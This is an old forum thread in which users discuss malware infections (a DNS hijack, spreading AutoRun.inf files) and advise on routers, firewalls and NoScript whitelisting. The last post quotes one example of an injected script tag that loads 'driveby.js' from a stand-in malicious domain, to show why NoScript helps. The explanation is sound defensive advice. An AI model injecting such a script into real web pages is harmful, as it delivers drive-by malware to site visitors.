Virus/Worm attacks - are they getting worse?

[Carol Haynes]

Is it just me or are virus and worm attacks getting worse?

I have gone for years without getting any malware on my system and in the space of a week I have had two unrelated incidents!

The first (which I mentioned in a different thread) swaped my DNS server so that all my internet traffic was routed through a server in the Ukraine!

Today another nasty managed to install AutoRun.inf files on every drive and resycled\boot.com (as a hidden system file/folder).

I don't know what the payload was but NOD32 managed to delete the files as fast as they replicated (but didn't clean my system of the problem).

No harm done and I now have a clean system again - but these must have been aquired as drivebys on websites.

I didn't visit porn or warez sites, I don't play games and the sites I visit are almost always mainstream website - so what is going on?

Am I paranoid or is someone really out to get me?

[cranioscopical]

Am I paranoid or is someone really out to get me?

-Carol

Definitely! 

Sorry to see you've been bugged by this kind of thing!

[wreckedcarzz]

Am I paranoid or is someone really out to get me?

-Carol

Definitely! 

Sorry to see you've been bugged by this kind of thing!

-cranioscopical (October 02, 2008, 06:05 PM)

 

[Carol Haynes]

 

[f0dder]

Are you behind a NATing router? (without DMZ and with sensible forwarding rules!)
Do you have XP's firewall enabled?
Do you use firefox+adblockplus+noscript?

If you answer yes to all the above, you shouldn't get malware... unless something's really really wrong.

[wreckedcarzz]

I personally have all the above, except I use DMZ for gaming (server host) needs, and my computer hasn't seen a bit of malicious software yet (almost 18 months old).

Make sure other users on the computer (if any) are locked down... I left my sister and her friend on my laptop alone (her user account, admin) for a couple hours a week ago, and had to reinstall Firefox, CS:S, and a couple other things afterward. Strangely, only some files were missing, and they weren't uninstalled.

[Grorgy]

I find no script to be perhaps the single most annoying piece of software ever to be on my computer, I was forever trying to configure the thing to let me see sites I wanted to see, I gave up, life's too short.

[wreckedcarzz]

NoScript isn't bad, nor hard to configure - I just go around browsing and when a site whines about having Javascript or Flash or something off or not installed, I just tick it on and away it goes (with a refresh, of course).

That's just my method, but you can't get much easier than that. A month of browsing and all your normal sites will be setup.

[Ehtyar]

Are you behind a NATing router? (without DMZ and with sensible forwarding rules!)
Do you have XP's firewall enabled?
Do you use firefox+adblockplus+noscript?

If you answer yes to all the above, you shouldn't get malware... unless something's really really wrong.

-f0dder (October 02, 2008, 06:31 PM)

I held my tongue, but I would have asked the same questions.

Ehtyar.

[Carol Haynes]

Are you behind a NATing router? (without DMZ and with sensible forwarding rules!)
Do you have XP's firewall enabled?
Do you use firefox+adblockplus+noscript?

If you answer yes to all the above, you shouldn't get malware... unless something's really really wrong.

-f0dder (October 02, 2008, 06:31 PM)

Yes - except for the noscript (installing it as I type this - can't think how I missed it) and I use AdMuncher rather than AdBlockPlus.

The only port forwarding rule I have added manually in my router is for uTorrent (and I only really use that for downloading video files).

[f0dder]

I find no script to be perhaps the single most annoying piece of software ever to be on my computer, I was forever trying to configure the thing to let me see sites I wanted to see, I gave up, life's too short.

-Grorgy (October 02, 2008, 06:41 PM)

Annoying? Indeed. And if you're impatient, you might end up whitelisting everything, removing the benefit of NoScript. Also, you could end up on a legitimate and whitelisted site... which has been hacked. But imho the added security is worth the hassle.

EDIT: personally I prefer ABP to AM - dunno why exactly, but I prefer not dealing with winsock hooking and only having my web browser filtered. Dunno which one is most likely to have "slips", but I haven't been hit with malware for several years. I guess running x64 also helps reduce some attack vectors - the browser + flash is still 32bit, and that probably is the main attack vector.

[Carol Haynes]

OK I am playing with noscripts and I can see how it works.

I am fine with going to amazon.co.uk and allowing [email protected] etc. but how do you decide which scripts are useful and which aren't?

For example google-analytics ? I guess if you block that then google robots won't pick up page visits/changes etc. and won't harm the browsing experience.

However, for a lot of the shopping sites I use I go through www.nectar.com so that I can collect Nectar points on purchases  - their site has a lot of scripts but it hard to tell which ones are involved in generating the communication with the shop site to ensure points are delivered. I am tempted just to let nectar.com do its thing (and all its scripts) but some of the scripts are for things like doubleclick (which I presume is a tracking/marketing tool because it seems to be endemic on a lot of legitimate trading sites).

What strategies do people use to decide what to allow and what to block?

[Ehtyar]

Firstly, you would naturally avoid those sites where you can. Where you can't, you start enabling subdomains of the primary domain until the content renders correctly, then carry on to those domains that appear to be legitimate. If that approach doesn't work, you can temporarily allow the entire page, though that really defeats the point of NoScript. NoScript can be a lot of work, but it's a lot of work for a good reason.

Ehtyar.

[Carol Haynes]

Thanks Ehyyar - I am really curious what stratagies people use.

It strikes me that if I am shopping on Amazon I implicitly trust the site so I may as well allow Amazon to display the content it wants, the way it wants.

Having said that if all of these security apps become to onerous you either end up enabling everything (and this goes for HIPS and firewalls too) or you uninstall it and use something simpler. It's one of the reasons I gave up on firewalls that aledgedly provide outbound security - you constantly have to answer questions and at the end of the day if you say no the software doesn't work properly (so you shouldn't install it in the first place) and if you say yes you are implicitly trusting the publisher not to do anything nasty so you may as well give it full control over its environment.

I know a lot of people round here use security apps to try and filter incoming and outgoing web traffic but it would be good if people chipped in and said how they discriminate between differnt kinds of apps/sites etc.

[Ehtyar]

Most often you're perfectly safe trusting javascript originating from a site you actually do trust (amazon.com for example). The trouble originates in things like SQL injection, whereby a script tag is inserted into the document which requests your browser load javascript from a different domain e.g.

[Select]

<script src="http://www.maliciousdomain.com/driveby.js" />

Thus, amazon.com scripts would run, as they're trusted, while the injected script would be blocked, as the code does not originate from amazon.com.

Ehtyar.